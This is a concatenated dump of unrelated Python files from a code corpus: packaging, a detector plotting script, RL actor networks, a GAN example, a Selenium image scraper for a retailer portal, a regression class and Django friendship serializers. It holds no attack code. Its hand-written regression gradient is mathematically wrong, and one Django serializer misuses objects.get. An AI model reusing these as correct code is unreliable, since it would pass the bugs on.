end\nuser'point-of-view.\n\nDocumentation:\nhttps://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/introduction.html\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"timst\"\n\n# Used for pytest and code coverage\nTESTS_REQUIEREMENTS = [\"pytest\", \"pytest-cov\"]\n# Depending on the documents more dependencies can be added\nDOCS_REQUIEREMENTS = [\"recommonmark\", \"sphinx_rtd_theme\", \"sphinxcontrib-bibtex\"]\n# Dependencies for the packages\nPACKAGE_REQUIEREMENTS = [\"numpy\", \"torch\", \"tqdm\", \"torchvision\"]\n\n# Read through Readme\ntry:\n this_directory = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\nexcept IOError:\n print(\"Read me file not found.\")\n\n\ndef get_version():\n \"\"\"Gets the version from the package's __init__ file\n if there is some problem, this fails.\n \"\"\"\n VERSIONFILE = os.path.join(\"src\", PACKAGE, \"__init__.py\")\n initfile_lines = open(VERSIONFILE, \"rt\").readlines()\n VSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n\n\nsetup(\n name=PACKAGE,\n version=get_version(),\n description=\"Image style transfer using Torch\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Tanjona R. Rabemananjara\",\n author_email=\"tanjona.rabemananjara@mi.infn.it\",\n url=\"https://github.com/Radonirinaunimi/Style-Transfer\",\n install_requires=PACKAGE_REQUIEREMENTS,\n extras_require={\"docs\": DOCS_REQUIEREMENTS, \"tests\": TESTS_REQUIEREMENTS},\n entry_points={\"console_scripts\": [\"timst = timst.run:main\", ]},\n package_dir={\"\": \"src\"},\n packages=find_packages(\"src\"),\n package_data={\"\": [\"logo/logo.png\"], },\n classifiers=[\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n setup_requires=[\"wheel\"],\n python_requires='>=3.6'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"59183828","text":"#!/usr/bin/env python3\n\nfrom scipp import array, DataArray, ones_like\nfrom argparse import ArgumentParser\nimport h5py, os\nimport matplotlib.pyplot as plt\n\n#nspertick = 11.356860963629653 # ESS clock is 88052500 Hz\n\n# Convert Ring and FEN to numbers or if not set, to 'A'\ndef id2chr(id):\n if id == -1:\n return 'any'\n else:\n return f'{id:02}'\n\ndef readtoscipp(filename):\n\n f = h5py.File(filename, 'r')\n dat = f['loki_readouts']\n\n #time = dat['EventTimeHigh'].astype('int')+dat['EventTimeLow'].astype('int')*nspertick/1000000000\n #time = array(values=time, dims=['event'], unit='sec')\n\n tube = array(values=dat['TubeId'].astype('int'), dims=['event'])\n ring = array(values=dat['RingId'].astype('int'), dims=['event'])\n fen = array(values=dat['FENId'].astype('int'), dims=['event'])\n\n ampl_a = array(values=1.0 * dat['AmpA'].astype('int'), dims=['event'], unit='mV')\n ampl_b = array(values=1.0 * dat['AmpB'].astype('int'), dims=['event'], unit='mV')\n ampl_c = array(values=1.0 * dat['AmpC'].astype('int'), dims=['event'], unit='mV')\n ampl_d = array(values=1.0 * dat['AmpD'].astype('int'), dims=['event'], unit='mV')\n\n events = ones_like(1. * tube)\n events.unit = 'counts'\n\n pos = (ampl_a + ampl_b) / (ampl_a + ampl_b + ampl_c + ampl_d)\n straw = (ampl_b + ampl_d) / (ampl_a + ampl_b + ampl_c + ampl_d)\n\n return DataArray(data=events,\n coords={'pos': pos, 'straw': straw, # 'time': time,\n 'tube': tube, 'ring': ring, 'fen': fen,\n 'amplitude_a': ampl_a, 'amplitude_b': ampl_b,\n 'amplitude_c': ampl_c, 'amplitude_d': ampl_d})\n\n\ndef load_and_save(args):\n dat = readtoscipp(args.filename)\n\n rgrp = array(dims=['ring'], values=[args.ring])\n fgrp = array(dims=['fen'], values=[args.fen])\n\n fig, ax = plt.subplots(4,2, figsize=(16,16))\n #fig.tight_layout()\n\n for i in range(args.tubes):\n print(f'processing ring {id2chr(args.ring)}, fen {id2chr(args.fen)}, tube {i}')\n tgrp = array(dims=['tube'], values=[i])\n if args.ring == -1 and args.fen == -1:\n grp = dat.group(tgrp).bins.concat()\n elif args.ring == -1 and args.fen != -1:\n grp = dat.group(fgrp, tgrp).bins.concat()\n elif args.ring != -1 and args.fen == -1:\n grp = dat.group(rgrp, tgrp).bins.concat()\n else:\n grp = dat.group(rgrp, fgrp, tgrp).bins.concat()\n\n yi = i // 2\n xi = i % 2\n cax = ax[yi, xi]\n grp.hist(pos=args.bin, straw=args.bin).plot(aspect=1.,norm='log', ax=cax)\n cax.title.set_text(f'Tube {i}')\n cax.set_xlim(args.xmin, args.xmax)\n cax.set_ylim(args.ymin, args.ymax)\n cax.yaxis.tick_left()\n cax.yaxis.set_label_position('left')\n if i <= 5:\n cax.set(xlabel='', ylabel='pos')\n else:\n cax.set(xlabel='straw', ylabel='pos')\n\n plt.suptitle(f'Ring: {id2chr(args.ring)}, FEN: {id2chr(args.fen)}, Tubes 0 - 8', size='28')\n plt.savefig(os.path.join(args.outdir, f'strawpos_{id2chr(args.ring)}_{id2chr(args.fen)}.png'))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog='dattoplot', description=__doc__)\n parser.add_argument('filename', type=str, nargs='?', default=\"\",\n help='.h5 file to load and plot')\n parser.add_argument('-o','--outdir', type=str, default=\"\",\n help='output directory')\n parser.add_argument('-r','--ring', type=int, default=-1, help='Ring Id (default all rings)')\n parser.add_argument('-f','--fen', type=int, default=-1, help='FEN Id (default all fens)')\n parser.add_argument('-t','--tubes', type=int, default=8, help='number of tubes')\n parser.add_argument('--xmin', type=float, default=0.0, help='min x-value')\n parser.add_argument('--xmax', type=float, default=1.0, help='max x-value')\n parser.add_argument('--ymin', type=float, default=0.0, help='min y-value')\n parser.add_argument('--ymax', type=float, default=1.0, help='max y-value')\n parser.add_argument('-b', '--bin', type=int, default=200, help='histogram bin size')\n\n args = parser.parse_args()\n\n load_and_save(args)\n","sub_path":"detectors/loki/h5tools/strawpos.py","file_name":"strawpos.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"459547345","text":"# Exercicio para praticar divisão inteira e resto da divisão.\n# author:milton lima\nentrada = int(input(\"Por favor, entre com o número de segundos que deseja converter:\"))\ndias = int(entrada//86400) \nsegundos = entrada % 86400\nhoras = int(segundos//3600)\nsegundos = segundos % 3600\nminutos = int(segundos//60)\nsegundos = segundos % 60\nprint(dias,\"dias,\",horas,\"horas,\",minutos,\"minutos e\",segundos,\"segundos.\")","sub_path":"segundos.py","file_name":"segundos.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316572729","text":"import torch\nimport torch.nn as nn\nfrom functools import reduce\n\nfrom catalyst.contrib.models import SequentialNet\nfrom catalyst.dl.initialization import create_optimal_inner_init, outer_init\nfrom catalyst.rl.agents.utils import normal_sample, normal_log_prob\nfrom catalyst.rl.agents.layers import StateNet, SquashingLayer, CouplingLayer\n\n# log_sigma of Gaussian policy are capped at (LOG_SIG_MIN, LOG_SIG_MAX)\nLOG_SIG_MAX = 2\nLOG_SIG_MIN = -10\n\n\nclass Actor(StateNet):\n \"\"\"\n Actor which learns deterministic policy.\n \"\"\"\n\n @classmethod\n def create_from_config(\n cls,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n dropout=None,\n norm_fn=None,\n bias=True,\n layer_order=None,\n residual=False,\n out_activation=None,\n memory_type=None,\n **kwargs\n ):\n assert len(kwargs) == 0\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n if isinstance(state_shape, int):\n state_shape = (state_shape, )\n\n if len(state_shape) in [1, 2]:\n # linear case: one observation or several one\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n observation_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n dropout=dropout,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias,\n layer_order=layer_order,\n residual=residual\n )\n elif len(state_shape) in [3, 4]:\n # cnn case: one image or several one @TODO\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n if memory_type == \"lama\":\n raise NotImplementedError\n elif memory_type == \"rnn\":\n raise NotImplementedError\n else:\n memory_net = None\n memory_out = hiddens[-1]\n\n head_net = SequentialNet(\n hiddens=[memory_out, action_size],\n layer_fn=nn.Linear,\n activation_fn=out_activation,\n norm_fn=None,\n bias=True\n )\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n observation_net.apply(inner_init)\n head_net.apply(outer_init)\n\n actor_net = cls(\n observation_net=observation_net,\n memory_net=memory_net,\n head_net=head_net\n )\n\n return actor_net\n\n\nclass GaussActor(nn.Module):\n \"\"\" Actor which learns mean and standard deviation of Gaussian\n stochastic policy. Actions obtained from the policy are squashed\n with (out_activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.policy_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=nn.Linear,\n activation_fn=None,\n norm_fn=None,\n bias=bias\n )\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.policy_net.apply(outer_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n\n mu, log_sigma = x[:, :self.n_action], x[:, self.n_action:]\n log_sigma = torch.clamp(log_sigma, LOG_SIG_MIN, LOG_SIG_MAX)\n sigma = torch.exp(log_sigma)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi, mu, log_sigma\n return action\n\n\nclass RealNVPActor(nn.Module):\n \"\"\" Actor which learns policy based on Real NVP Bijector.\n Such policy transforms samples from N(z|0,I) into actions and\n then squashes them with (out activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.embedding_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=layer_fn,\n activation_fn=None,\n norm_fn=norm_fn,\n bias=bias\n )\n\n self.coupling1 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"odd\"\n )\n self.coupling2 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"even\"\n )\n\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.embedding_net.apply(inner_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n state_embedding = self.embedding_net.forward(x)\n\n mu = torch.zeros((observation.shape[0], self.n_action)).to(x.device)\n sigma = torch.ones_like(mu).to(x.device)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n z, log_pi = self.coupling1.forward(z, state_embedding, log_pi)\n z, log_pi = self.coupling2.forward(z, state_embedding, log_pi)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi\n return action\n","sub_path":"rl/agents/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4904392","text":"import logging\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.contrib import learn\nfrom tensorflow.contrib import layers\n\ndef generator(x, hidden_size):\n with tf.variable_scope('Generator'):\n h0 = tf.nn.softplus(layers.linear(x, hidden_size))\n return layers.linear(h0, 1)\n\n\ndef discriminator(x, hidden_size, scope='Discriminator', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n h0 = tf.tanh(layers.linear(x, hidden_size * 2))\n h1 = tf.tanh(layers.linear(h0, hidden_size * 2))\n h2 = tf.tanh(layers.linear(h1, hidden_size * 2))\n return tf.sigmoid(layers.linear(h2, 1))\n\n\ndef gan_model(feature, unused_target):\n z = tf.random_uniform(tf.shape(feature), -1, 1, dtype=feature.dtype)\n z.set_shape(feature.get_shape())\n feature_generated = generator(z, 10)\n discr_true = discriminator(feature, 10)\n discr_generated = discriminator(feature_generated, 10, reuse=True)\n loss_discr = tf.reduce_mean(-tf.log(discr_true) - tf.log(1 - discr_generated))\n loss_generator = tf.reduce_mean(-tf.log(discr_generated))\n\n variables = tf.trainable_variables()\n generator_params = [v for v in variables if v.name.startswith('Generator/')]\n discriminator_params = [v for v in variables if v.name.startswith('Discriminator/')]\n gc = tf.contrib.framework.get_global_step()\n learning_rate = tf.train.exponential_decay(\n 0.005, gc, 150, 0.95, staircase=True)\n with tf.variable_scope('Discriminator'):\n discriminator_train_op = layers.optimize_loss(\n loss_discr, gc, variables=discriminator_params,\n learning_rate=learning_rate, optimizer='Adam', summaries=[])\n with tf.variable_scope('Generator'):\n generator_train_op = layers.optimize_loss(\n loss_generator, gc, variables=generator_params,\n learning_rate=learning_rate, optimizer='Adam', summaries=[])\n\n return (feature_generated, loss_discr + loss_generator,\n tf.group(discriminator_train_op, generator_train_op))\n\n\ndef main():\n tf.logging._logger.setLevel(logging.INFO)\n data = np.random.normal(4, 0.5, 10000).astype(np.float32)\n data.sort()\n est = learn.Estimator(model_fn=gan_model)\n est.fit(x=data, y=data, steps=10000, batch_size=32)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"gan/gan_intro.py","file_name":"gan_intro.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"483444712","text":"'''\nAutor: Marcos Felipe da Silva\nversão: 1.5\ndata: 18-11-2019\n------------------------------\nAcessar o site da luxottica, se autenticar, navegar nos menus, retirar imagens e sair\n------------------------------\nHistorico:\nv1.0 Acessa site da luxottica, autentica navega sobre os menus e extrai as imagens das armações\nv1.1 Agora com melhorias de erros, controla a gravação das imagens, reconhece imagens não encontradas\n e gera log dos links de imagens que foram obtidas como gifs\nv1.2 Acertado problema onde o script nao estava saltando para a proxima pagina dentro da grife.\nv1.3 Incluso o atendimento a uma execao quando for baixar imagem e tambem incluso o scrollTo para rolar abaixo na tela\nV1.4 Salva o local onde se encontra o fluxo de download para retomar do ponto onde parou.\nv1.5 Baixa imagens de tamanho maior para melhorar visualização das mesmas.\n'''\n\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport selenium.common.exceptions\nfrom bs4 import BeautifulSoup as bfs\nfrom urllib.request import urlretrieve\nfrom time import sleep\nfrom chave_api import chave\nimport re, os, urllib, pickle\n\n\nchrome_driver = '../chrome/chromedriver'\nurl = 'https://my.luxottica.com'\n## Opcoes do chrome\nopt = ChromeOptions()\nopt.add_argument('--headless')\n\ntempo = 2 # tempo de espera dos processos\n# Arquivo que contem o indice de onde a busca de armações parou\nARQUIVO_INDICE_GRIFES = 'grifes.pickle'\n#\n\ndados_salvos = {\n 'grife': 0,\n 'pag_atual':1 \n}\n# CARREGANDO O INDICE ATUAL (SE EXISTIR)\nif os.path.exists(ARQUIVO_INDICE_GRIFES):\n with open(ARQUIVO_INDICE_GRIFES, 'rb') as arq:\n dados_salvos = pickle.load(arq)\n\n\nclass Luxottica:\n\n def __init__(self, url, pag_atual):\n self._url = url\n self.__driver = Chrome(chrome_driver, options=opt)\n self.__driver.get(url)\n self._regex_grifes = {'data-analytics': re.compile('.*')}\n self._pag_atual = pag_atual # controla o indice atual da pagina\n self._grife_atual = None\n self._modelo_atual = None\n self._cor_atual = None\n \n sleep(2)\n \n def login(self):\n cpUser = self.__driver.find_element_by_name('logonId')\n cpPasswd = self.__driver.find_element_by_name('logonPassword')\n bt = self.__driver.find_element_by_xpath('//button[@type=\"submit\"]')\n # Envaindo usuario e senha\n cpUser.clear();cpUser.send_keys(chave['usuario'])\n #sleep(1)\n cpPasswd.clear();cpPasswd.send_keys(chave['senha'])\n #sleep(1)\n bt.click()\n sleep(1)\n self.selecao_grife()\n sleep(2)\n self.quit()\n return True\n \n def quit(self):\n self.__driver.quit()\n\n def selecao_grife(self):\n ''' Metodo seleciona a grife informada procurando por data-analytics'''\n # Recupere e exiba todas as grifes disponiveis\n bs = bfs(self.__driver.page_source, 'html5lib')\n # Obtem os links\n todas = bs.find('ul', {'class':'brand-element product toAnalytics'}).find_all('a', self._regex_grifes)\n for num, t in enumerate(todas[dados_salvos['grife']:], dados_salvos['grife']):\n # SALVANDO A POSICAO ATUAL QUE ESTOU\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n dados_salvos['grife'] = num\n pickle.dump(dados_salvos, arq)\n\n self.__driver.get(t['href'])\n sleep(tempo)\n while True: # Equanto tiver pagina para seguir adiante\n sleep(tempo) # temp\n pagina_atual = self.__driver.current_url\n self._grife_atual = t['data-analytics'].strip() # Pega o nome da grife atual\n # VER SE JA FOI CARREGADO\n try:\n element = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, 'a.current'))\n )\n bs = bfs(self.__driver.page_source, 'html5lib')\n finally:\n pag_atual = int(bs.find('a', {'class': 'current'}).get_text())\n # SE self._pag_atual FOR MAIOR QUE pag_atual VA AVANCANDO ATE A PAGINA QUE PRECISA ESTAR\n if self._pag_atual > pag_atual: # AVANCE UMA PAGINA\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n continue\n\n\n\n print('PAGINA ATUAL %d' % int(pag_atual))\n # Selecione os modelos\n modelos = bs.find('section', {'class': 'product-grid'}).find('ul').find_all('div', {'class': 'wrap-link'})\n # passe cada mode para ter sua imagem extraida\n for md in modelos:\n self._modelo_atual = md.find('h3', {'class': 'model-code'})['data-analytics'].strip()\n href = md.find('a')['href']\n self.selecao_modelo(href)\n self._modelo_atual = None # zerando o modelo\n # acabou a pagina, passe para a outra (procure por data-analytics=\" NEXT\")\n nextLink = bs.find('a', {'data-analytics': \" NEXT\"})\n if nextLink:\n # RECUPERAR O OBJETO AGORA\n self.__driver.get(pagina_atual)\n sleep(tempo)\n elemento = None\n try: # Espere o icone do data-analytics aparecer\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[@data-analytics=\" NEXT\"]'))\n )\n except selenium.common.exceptions.StaleElementReferenceException:\n print('NAO ENCONTRADO BOTAO PARA CLICK ')\n print(self.__driver.page_source)\n finally:\n if not elemento is None:\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n self._pag_atual += 1\n # Salvar posicao atual da pagina\n self.salvar_dados()\n print('PASSANDO A PROXIMA PAGINA')\n else: # Chegamos ao fim. passando para a proxima familia\n print('FIM DA GRIFE ----------->')\n self._pag_atual = 1\n self.salvar_dados()\n break\n\n self._grife_atual = None # Zerando a grife\n\n def salvar_dados(self):\n ''' Salva a pagina atual e a grife que se encontra '''\n dados_salvos['pag_atual'] = self._pag_atual\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n pickle.dump(dados_salvos, arq)\n \n \n def selecao_modelo(self, modelo):\n ''' Metodo seleciona o modelo ORJ9052S e então passa as cores '''\n #\n self.__driver.get(modelo)\n sleep(tempo)\n # Da uma navegada na pagina para carregar ela por completo\n for i in range(1, 8):\n self.__driver.execute_script('window.scrollTo(0, %d);' % (i * 200))\n sleep(.5)\n \n bs = bfs(self.__driver.page_source, 'html5lib')\n #Se prosseguir com erro vamos tratar a exceção\"\n elemento = None\n try:\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//table[@id=\"brand-products-info\"]'))\n )\n if not elemento is None: todos_itens = bs.find('table', {'id':'brand-products-info'}).find('tbody').find_all('tr')\n except selenium.common.exceptions.TimeoutException:\n pass\n finally:\n if elemento is None or not elemento:\n print(elemento) \n print('NÃO ENCONTROU CONJUNTO DE CORES')\n todos_itens = []\n \n for item in todos_itens:\n print(self._grife_atual, '_', self._modelo_atual, '_', item['data-color'])\n self._cor_atual = item['data-color'].strip().replace('/', '--')\n imagem = item.find('td', {'class':'first'}).find('img', {'class':'images lazy'})\n self.selecao_cor(self._url+imagem['src'])\n #sleep(tempo) não é necessário um tempo\n self._cor_atual = None # Zerando a cor\n\n def selecao_cor(self, cor):\n ''' FINALMENTE NA SELECAO DE COR CONSEGUE-SE BAIXAR a imagem desejada '''\n #NECESSARIO LIDAR COM IMAGENS QUE NAO EXISTAM urllib.error.HTTPError: HTTP Error 404: Not Found\n nome, ext = os.path.basename(cor).rsplit('.', 1)\n nome_arquivo = '_'.join([self._grife_atual, self._modelo_atual, self._cor_atual])+'.'+ext\n # Todos que são .gif devem ser armazenados no arquivo gifs.log\n if ext == 'gif':\n with open('gifs.log', 'a') as arq:\n arq.write('%s \\n' % (nome_arquivo))\n return False\n \n if not os.path.exists('imagens/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n try:\n urlretrieve(cor, 'imagens/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, cor, str(err)))\n # VEJA SE O ARQUIVO DE RESOLUCAO MAIOR TAMBÉM NAO EXISTE, SE NÃO EXISTIR SALVE\n if not os.path.exists('imagens_maior/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n # troque 222x111 por 890x445\n novo_cor = cor.replace('222x111', '890x445')\n try:\n urlretrieve(novo_cor, 'imagens_maior/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, novo_cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, novo_cor, str(err)))\n\n\nif __name__ == '__main__':\n # Instanciando a Luxottica e ativando o login\n l = Luxottica(url, dados_salvos['pag_atual'])\n l.login()\n\n\n","sub_path":"luxottica/luxottica.py","file_name":"luxottica.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"542816820","text":"import random\r\nimport math\r\nimport pygame\r\nimport time\r\n\r\na = dir(random)\r\nb = dir(math)\r\nc = dir(pygame)\r\nd = dir(time)\r\n\r\nline = 0\r\nline1 = 0\r\nline2 = 0\r\nline3 = 0\r\nline4 = 0\r\nrandomMod = 61\r\nmathMod = 54\r\npygameMod = 334\r\ntimeMod = 25\r\n\r\nfor item in a:\r\n\r\n line += 1\r\n lin = str(line)\r\n print(lin + \".\" + item)\r\n\r\nfor item in b:\r\n\r\n line1 += 1\r\n lin1 = str(line1)\r\n print(lin1 + \".\" + item)\r\n\r\nfor item in c:\r\n\r\n line2 += 1\r\n lin2 = str(line2)\r\n print(lin2 + \".\" + item)\r\n\r\nfor item in d:\r\n\r\n line3 += 1\r\n lin3 = str(line3)\r\n print(lin3 + \".\" + item)\r\n","sub_path":"Newbie-Python/newbie-python-39.py","file_name":"newbie-python-39.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"378551937","text":"# This class contains the MultivariateRegression Functions\n# This class can be imported in jupyter and data can be plotted there\n\n\nclass MultivariateRegression():\n \"\"\"\n Initialise the class with X and Y of the training set. Y MUST be\n a one-dimensional array where as X can be of any shape. However,\n the number of elements in X and Y must be the same.\n Please remember to clean the dataset before initialisation. Otherwise,\n BLUNDERS appear for sure. This class DOES NOT handle cleaning.\n \"\"\"\n\n def __init__(self, X, Y, num_of_features, learning_rate=0.0005):\n if len(X) != len(Y):\n raise Exception(\"X and Y don't have same element count !!!\")\n elif len(X) <= 0 or len(Y) <= 0:\n raise Exception(\"X or Y is empty or invalid !!!\")\n self.X = X\n self.Y = Y\n self.num_of_features = num_of_features\n self.N = len(X)\n self.weights = [0.0] * self.num_of_features\n self.is_trained = False\n self.learning_rate = learning_rate\n self.cost_history = []\n\n def get_mse(self):\n # This function returns the MSE based on the weights\n mse = 0.0\n for i in range(self.N):\n mse += (self.Y[i] - self.product(self.weights, self.X[i])) ** 2\n return mse/self.N\n\n @staticmethod\n def product(X, Y):\n # This is static method that multipies two matrices and\n # returns the product value. It takes two 1-d Arrays of same length.\n sum = 0.0\n for x, y in zip(X, Y):\n sum += x * y\n return sum\n\n def update_weights(self):\n # This function updates the weights array using gradient descent\n weight_derivs = [0.0] * self.num_of_features\n for i in range(self.N):\n common_term = -2 * (self.Y[i] - self.product(self.X[i], self.weights)) ** 2\n for j in range(self.num_of_features):\n weight_derivs[j] += common_term * self.weights[j]\n for i in range(self.num_of_features):\n self.weights[i] -= (weight_derivs[i]/self.N) * self.learning_rate\n\n def train(self, debug=False, debugInterval=5, iterations=100, max_error=5):\n # This function calculates the weights required for the minimum MSE\n self.cost_history = []\n for i in range(iterations):\n self.update_weights()\n cost = self.get_mse()\n self.cost_history.append({\n \"weights\": self.weights,\n \"cost\": cost\n })\n if i % debugInterval == 0 and debug:\n print(f'cost {cost} iteration {i} weights {self.weights}')\n if cost < max_error:\n break\n self.is_trained = True\n\n def predict(self, X):\n # Returns a prediction based on the calculated weights\n if self.is_trained:\n return self.product(X, self.weights)\n raise Exception('Please train model before predicting !!!')\n","sub_path":"regreesion/multivariate_regression/MultivariateRegression.py","file_name":"MultivariateRegression.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"330832152","text":"from django.contrib.auth.models import User\nfrom friendship.models import Friend, FriendshipRequest\nfrom rest_framework import serializers\nfrom rest_framework.fields import CharField,IntegerField\n\n\nclass UserFriendsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Friend\n fields = ('to_user_id',)\n\nclass FriendshipRequestsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = FriendshipRequest\n fields = ('id', 'from_user_id')\n\nclass SendRequestSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class Meta:\n model = Friend\n fields = ['from_user_id', 'to_user_id', ]\n\n def create(self, validated_data):\n from_user_id = validated_data['from_user_id']\n to_user_id = validated_data['to_user_id']\n from_user=User.objects.get(pk=from_user_id)\n to_user=User.objects.get(pk=to_user_id)\n Friend.objects.add_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return validated_data\n\nclass DeleteFriendSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class Meta:\n model = Friend\n fields = ['from_user_id', 'to_user_id', ]\n\n def destroy(self, request):\n from_user_id = request['from_user_id']\n to_user_id = request['to_user_id']\n from_user=User.objects.get(from_user_id)\n to_user=User.objects.get(to_user_id)\n Friend.objects.remove_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return request\n\nclass AcceptFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def create(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n 